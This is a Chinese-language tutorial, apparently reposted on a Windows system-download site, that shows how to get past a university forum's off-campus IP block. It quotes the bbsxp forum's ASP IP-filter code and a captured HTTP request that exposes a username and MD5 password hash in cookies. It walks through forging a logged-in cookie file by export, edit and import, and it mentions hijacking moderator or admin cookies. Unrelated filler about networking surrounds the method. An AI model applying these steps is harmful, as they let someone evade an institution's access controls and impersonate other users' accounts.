|
網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。 教育部的一紙文件,國內各大高校的bbs一夜之間都被設置成只允許校內發帖。我們學校論壇是采用bbsxp(破論壇系統),本來由于服務器帶寬的原因,人氣就很低。管理員哥哥又封了校外的ip,不能登陸發帖。好多斑竹都是在用校園里的鐵通寬帶上網,還有些畢業了的,我們電腦版的可愛的echo,都進不來....(廢話一大堆)OK讓我們開始。 論壇過濾 ip是在setup.asp這個頁, if Request.Cookies("username") <> empty then sql="select * from [user] where username='"&HTMLEncode(Request.Cookies("username"))&"'" Set Rs=Conn.Execute(SQL) if rs.eof then Response.Cookies("username")="" if Request.Cookies("userpass") <> rs("userpass") then Response.Cookies("username")="" membercode=rs("membercode") userface=""&rs("userface")&"" newmessage=rs("newmessage") userlife=rs("userlife") set rs=nothing end if if Request.ServerVariables("HTTP_X_FORWARDED_FOR")=empty then remoteaddr=Request.ServerVariables("REMOTE_ADDR") else remoteaddr=Request.ServerVariables("HTTP_X_FORWARDED_FOR") end if if badip<>empty then filtrate=split(badip,"|") for i = 0 to ubound(filtrate) if instr("|"&remoteaddr&"","|"&filtrate(i)&"") > 0 then response.redirect "inc/badip.htm" next end if if Request.Cookies("skins")=empty then Response.Cookies("skins")=style 這段代碼就是setup.asp里驗證用戶這塊,先讀下吧.如果cookies不為空,則讀取數據庫驗證用戶的密碼是否正確,正確的話定義變量,把一些需要用到的變量全都用數據庫里讀出來的數據賦值。然后進行讀ip.如果ip屬于被封的,則導向badip.htm禁止發登陸。 我們學校的系統和這個代碼有出入,他們是自己改的代碼。把校外的ip 全封掉,不過都是在這個基礎上改的。他們的驗證是另外寫了一段代碼驗證的。應該是在登陸頁做的封ip段代碼,猜想是先判斷cookies是否是真的,如果存在的話就直接跳過驗證ip那段。如果為空的話,則用戶沒有登陸,然后才進行ip驗證。他們的思路應該是這樣。(沒辦法,不是我自己的系統,只能猜他們的封ip思路)導致過濾不嚴密。 如果個人文件中有cookies,系統就認為用戶已經登陸,而不再進行ip的驗證。這個就是我們今天破解被鎖ip登陸的關鍵之處。偽造cookies GET /images/closedfold.gif HTTP/1.1 Accept: */* Referer: [url]http://bbs.glite.edu.cn/ShowForum.asp?forumid=31[/url] Accept-Language: zh-cn Accept-Encoding: gzip, deflate If-Modified-Since: Wed, 15 May 2002 07:17:34 GMT If-None-Match: "07b5995e0fbc11:17b1" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon) Host: bbs.glite.edu.cn Connection: Keep-Alive Cookie: onlinetime=2005%2D5%2D28+14%3A43%3A04; addmin=60; ASPSESSIONIDACBSQCCT=LKFHJHECMPOOCDCPHEJIADHC; forumid=31; filename=%7C2005528131326%7C2005528134747; username=yuan8627; userpass=F1913EB31C9CA1F1341B1DC9DE069D8C; eremite=0 抓包顯示cookies內容,上線時間onlinetime 在線分鐘數addmin,看這段 username=yuan8627; userpass=F1913EB31C9CA1F1341B1DC9DE069D8C;。我們不得不又一次罵bbsxp這個論壇垃圾,用戶名和密碼都是數據庫中的,雖然經過md5加密。dvbbs中cookies里的密碼和數據庫中的密碼不一樣,分開驗證,所以偽造cookies幾乎不可能。bbsxp 中代碼的安全考慮不夠,還號稱國內最安全....如果有用戶而已劫持了斑竹或者是管理員的cookies,然后進行cookies偽造,前臺的權限可以刪除帖子,修改帖子,版塊。后果不堪設想。這個只留給有心的人了。 我們今天是要偽造個登陸過的cookies,然后突破ip封鎖。 不能進行登陸,所以不能用iecv.exe來進行編輯.cookies 修改的同時會修改目錄下的 index.dat這個文件{IE的索引文件,瀏覽的網頁越多暗藏的“index.dat”索引文件容量也就越大。此選項可以初始化index.dat文件。}我發現ie下有個導入導出cookies功能,所以先把自己的cookies導出,然后再用把用戶名和密碼替換成另外一個號的,然后再進行導入。發現成功了,cookies導入的同時修改了目錄下的index.dat 文件 所以,我們只需要自己把以前的cookies導出,然后在需要進入論壇的時候直接導入就可以自由的出入論壇了,再也沒有ip的限制。 我在鐵通的校外網上測試成功。 # Internet Explorer cookie file, exported for Netscape browsers. bbs.glite.edu.cn TRUE / FALSE 1149109143 username 請用你的用戶名覆蓋 bbs.glite.edu.cn TRUE / FALSE 1149109143 userpass 請用你的經過加密的密碼覆蓋 bbs.glite.edu.cn TRUE / FALSE 1149109143 eremite 0 這個是導出的cookies文件內容,直接用自己的用戶名和經過MD5加密的密碼覆蓋,用ie導入就可以進入論壇了。 MD5是32加密,加密工具上網搜一下一大把。 網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。 |
溫馨提示:喜歡本站的話,請收藏一下本站!
本站發布的Win7純凈版系統、Win10純凈版和XP純凈版系統僅為個人學習測試使用,請在下載后24小時內刪除,不得用于任何商業用途,否則后果自負,請支持購買微軟正版軟件!
本站所有資源全部來自于網絡資源,如侵犯到您的權益,請及時通知我們(),我們會及時處理.
Copyright © 2018-2020 蘿卜系統 手機站 關于本站
